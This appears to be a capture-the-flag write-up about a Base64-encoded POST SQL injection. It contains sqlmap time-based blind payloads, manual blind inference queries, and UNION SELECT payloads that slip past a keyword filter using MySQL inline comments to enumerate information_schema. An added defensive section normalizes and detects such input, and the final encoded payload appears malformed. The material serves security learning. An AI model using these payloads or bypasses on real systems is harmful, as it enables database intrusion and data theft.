"Mysql SQL Inject" POST method BASE64 encoding injection write-up

Source: Internet
Author: User
Tags: base64, mysql, injection, ord, web server, operating system



A friend in the group posted a POST-type SQL injection challenge. A quick packet capture showed that the SQL statement has to be Base64-encoded before the server will execute it. Since I wanted to learn the challenge and the idea behind the breakthrough, and work was not very busy, I spent some time playing with it, hahaha.



http://104.224.169.128/tasks/web12.php


```html
<script language="javascript">
function onSearch()
{
    var pwd = document.forms[0].inText.value;
    // jQuery base64 plugin: encode the visible field and copy it into the hidden one
    $.base64.utf8encode = true;
    document.forms[0].inputText.value = $.base64.encode(pwd);
    document.forms[0].submit();
}
</script>
```
 

**Thinking process:**
First capture the request and test it with sqlmap; Firefox HackBar works here. It is obvious that the value submitted in a hidden form field is Base64-encoded. Most challenges of this kind expect participants to test by hand before reaching for tools. At first I thought it would not be difficult: with sqlmap, just capture the packet and add the `--tamper=base64encode` module. Later I found that I could only read the database name; adding `-v 5` to get the detailed payload shows sqlmap is using time-based blind SLEEP() inference. What the hell?

0x01 SQLMAP:
First test: enumerate the database name

```
inText=1111&inputText=JyBBTkQgNTY3MD1JRigoT1JEKE1JRCgoSUZOVUxMKENBU1QoREFUQUJBU0UoKSBBUyBDSEFSKSwweDIwKSksMTIsMSkpPjEpLFNMRUVQKDUpLDU2NzApIEFORCAnRkt6SScgTElLRSAnRkt6SQ%3D%3D
```


```
[18:39:54] [TRAFFIC IN] HTTP response [#4613] (200 OK):
Content-length: 1215
Content-language: en-US
Uri: http://104.224.169.128:80/tasks/web12.php
Server: Apache/2.2.15 (CentOS) DAV/2
Connection: close
Date: Tue, 19 Apr 2016 10:39:53 GMT
Content-type: text/html
[18:39:55] [INFO] retrieved: injecttest2
[18:39:55] [DEBUG] performed 95 queries in 694.98 seconds
current database: 'injecttest2'
[18:39:55] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\104.224.169.128'
```
 

Second test: table names cannot be found

 

Full output obtained after adding -v:

```
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: inText=11111111&inputText=' AND SLEEP(5) AND 'uYGj' LIKE 'uYGj
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
web server operating system: Linux CentOS 6.5
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.12
available databases [1]:
[*] injecttest2

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: inText=11111111&inputText=' AND SLEEP(5) AND 'uYGj' LIKE 'uYGj
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
web server operating system: Linux CentOS 6.5
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.12
No tables found

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: inText=11111111&inputText=' AND SLEEP(5) AND 'uYGj' LIKE 'uYGj
---
web server operating system: Linux CentOS 6.5
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.12
No tables found
```
 

Extract sqlmap's payload:

```sql
' AND 5670=IF((ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),12,1))>1),SLEEP(5),5670) AND 'FKzI' LIKE 'FKzI
```
0x02 Manual test
Manually closing the single quote of the SQL statement and injecting by hand is very satisfying. Hum hum;
(1) Local test
Studied sqlmap's payload and looked up the usage of IF(), ORD(), MID(), IFNULL(), CAST() and the other functions;
Simplified sqlmap's SLEEP()-based payload into a true/false form: compare the length of the page content returned for AND 5670=5670 against the false case to confirm the injection, then guess the database name blindly, character by character.

```
mysql> select * from the_flag_table where the_flag_content like '%' AND 5670=IF((ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>116),5671,5670);
+----------------------+-----------------+
| the_flag_content     | the_value123456 |
+----------------------+-----------------+
| flags{Hello,Iamflags | 1               |
| flags2(hello,test)   | 2               |
+----------------------+-----------------+
2 rows in set (0.00 sec)

mysql> select * from the_flag_table where the_flag_content like '%' AND 5670=IF((ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>116),5670,5671);
Empty set (0.00 sec)
```
 

Detect the database name length;

```sql
select * from the_flag_table where the_flag_content like '%' union select (LENGTH((IFNULL(CAST(DATABASE() AS CHAR),0x20)))>11),222--
```
 

Use the MID() function to check each character's ASCII code one position (N) at a time;

```sql
' AND 5670=IF((ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),N,1))>105),5670,5671)--
```

**Conclusion:**
Database: injecttest2
User: [email protected]
(2) Plot twist:
While I was in full swing testing the IF()-function injection, a younger member of the group pointed out that this IF()-based injection can only query DATABASE(), USER() and VERSION(); the table contents cannot be retrieved...
At that moment my heart broke...

0x03 Keyword bypass test:
Had to fall back on the old approach: collect articles on bypassing MySQL injection filters, work out what is being detected, and settle on an idea;
(1) A keyword in the SQL statement is filtered, such as union, select, etc.;
(2) Special symbols are filtered, such as spaces, single quotes, equals signs, etc.;
(3) A particular string of characters is filtered;
Testing keywords, symbols and other conditions individually did not trigger the detection policy, but entering "' union select 1--" did;

I picked related articles and tested them one by one, following the IDS/WAF bypass methods described in the two articles below. It turned out that inline comments bypass the filter. Since the injection point is already Base64-encoded, the encoding tricks from the articles can be dropped:
"In-depth understanding of SQL injection bypass of WAF and filtering mechanisms"
http://drops.wooyun.org/tips/968
Avoiding Keywords
http://websec.ca/kb/sql_injection

**Inline comment payloads**
Below is my payload sequence using inline comments;
Field description:
Target database name: injecttest2
Database name after hex encoding: 696e6a6563747465737432
Target table names: article, __key___in__this
Table name "__key___in__this" after hex encoding: 0x5f5f6b65795f5f5f696e5f5f74686973
Target field: keystr
Retrieved content: Key: d8b3bc4ecd8791fb

```sql
' order by 3--
```
**Library name**
```sql
'/*!union*/ /*!select*/ version(),2,3--
'/*!union*/ /*!select*/ (/*!select*/ schema_name from information_schema.schemata limit 1,1),2,3--
```
**Table name**
```sql
'/*!union*/ /*!select*/ (/*!select*/ table_name from information_schema.tables where table_schema=0x696e6a6563747465737432 /*!*/ limit 1,1),2,3--
```
**Field name**
```sql
'/*!union*/ /*!select*/ (/*!select*/ column_name from information_schema.columns where table_name=0x5f5f6b65795f5f5f696e5f5f74686973 limit 0,1),2,3--
```
**Flag get**
```sql
'/*!union*/ /*!select*/ (/*!select*/ keystr from __key___in__this limit 0,1),2,3--
```
 

**Supplement**
Someone else bypassed the filter with a different inline-comment method during testing, so I add it here to complete the process. Below are three example screenshots;

```sql
' order by 3--
' union select /*!*/ 1,2,3--
```
**Library name**
```sql
' union select /*!*/ (select /*!*/ schema_name from information_schema.schemata limit 0,1),2,3--
' union select /*!*/ (select /*!*/ schema_name /*!*/ from information_schema.schemata /*!*/ limit 1,1),2,3--
```
**Table name**
```sql
' union select /*!*/ (select /*!*/ table_name /*!*/ from information_schema.tables where table_schema=0x696e6a6563747465737432 /*!*/ limit 1,1),2,3--
```
**Field name**
```sql
' union select /*!*/ (select /*!*/ column_name /*!*/ from information_schema.columns where table_name=0x5f5f6b65795f5f5f696e5f5f74686973 /*!*/ limit 0,1),2,3--
```
**Flag get**
```sql
' union select /*!*/ (select /*!*/ keystr /*!*/ from __key___in__this /*!*/ limit 0,1),2,3--
```
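As an added, defender-side example that is not part of the original write-up: the two bypass lists above and the sqlmap payload in section 0x01 show why a keyword blacklist applied to the raw input fails. This Python snippet decodes the hidden `inputText` field, normalizes MySQL `/*!...*/` inline comments the way the server will actually parse them, and only then matches injection indicators; `make_body` and `naive_filter_blocks` are hypothetical helpers standing in for the form submission and the challenge's assumed raw-string filter.

```python
import base64
import re
from urllib.parse import parse_qs, urlencode

# Hypothetical helper (not from the challenge): builds a POST body in the shape the
# form submits, i.e. visible inText plus the hidden Base64-encoded inputText.
def make_body(in_text: str, sql: str) -> str:
    return urlencode({"inText": in_text,
                      "inputText": base64.b64encode(sql.encode()).decode()})

def decode_input_text(body: str) -> str:
    """Base64-decode the hidden inputText field; return '' if absent or malformed."""
    raw = parse_qs(body, keep_blank_values=True).get("inputText", [""])[0]
    try:  # binascii.Error is a ValueError subclass
        return base64.b64decode(raw, validate=True).decode("utf-8", "replace")
    except ValueError:
        return ""

# MySQL executes the body of a /*!...*/ version comment, so a matcher must read
# /*!union*/ as "union"; ordinary /*...*/ comments are whitespace to the parser.
INLINE_COMMENT = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.S)
BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)

def normalize(sql: str) -> str:
    """Rewrite the decoded input into the token stream MySQL would actually parse."""
    sql = INLINE_COMMENT.sub(r" \1 ", sql)
    sql = BLOCK_COMMENT.sub(" ", sql)
    return " ".join(sql.split()).lower()

INDICATORS = {
    "union-select": re.compile(r"\bunion\b.*\bselect\b"),
    "time-based": re.compile(r"\b(sleep|benchmark)\s*\("),
    "char-inference": re.compile(r"\b(ord|ascii)\s*\(\s*(mid|substr|substring)\s*\("),
    "schema-enumeration": re.compile(r"\binformation_schema\b"),
}

def classify(body: str) -> list:
    """Decode, normalize, then report which injection patterns the input contains."""
    norm = normalize(decode_input_text(body))
    return sorted(name for name, pat in INDICATORS.items() if pat.search(norm))

def naive_filter_blocks(sql: str) -> bool:
    """Assumed keyword blacklist matching the raw string, which inline comments evade."""
    return re.search(r"\bunion\s+select\b", sql, re.I) is not None

# Constructed samples: sqlmap's time-based probe and the inline-comment bypass from the write-up.
SQLMAP_PROBE = ("' AND 5670=IF((ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),12,1))>1),"
                "SLEEP(5),5670) AND 'FKzI' LIKE 'FKzI")
BYPASS = ("'/*!union*/ /*!select*/ (/*!select*/ table_name from information_schema.tables "
          "where table_schema=0x696e6a6563747465737432 /*!*/ limit 1,1),2,3--")
```

`naive_filter_blocks(BYPASS)` is False while `classify(make_body("1", BYPASS))` reports `['schema-enumeration', 'union-select']`; the only durable fix remains a parameterized query, since no blacklist can keep pace with MySQL's comment syntax.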
 

**Payload**

```
inText=1&inputText=%JyB1bmlvbiBzZWxlY3QvKiEqLyhzZWxlY3QvKiEqL3NjaGVtYV9uYW1lLyohKi9mcm9tLyohKi9p1W1L2W2
```
Related example:
[Weifeng official app has SQL injection (full sqlmap POST Base64 encoding example)]
http://www.wooyun.org/bugs/wooyun-2010-0177954

 



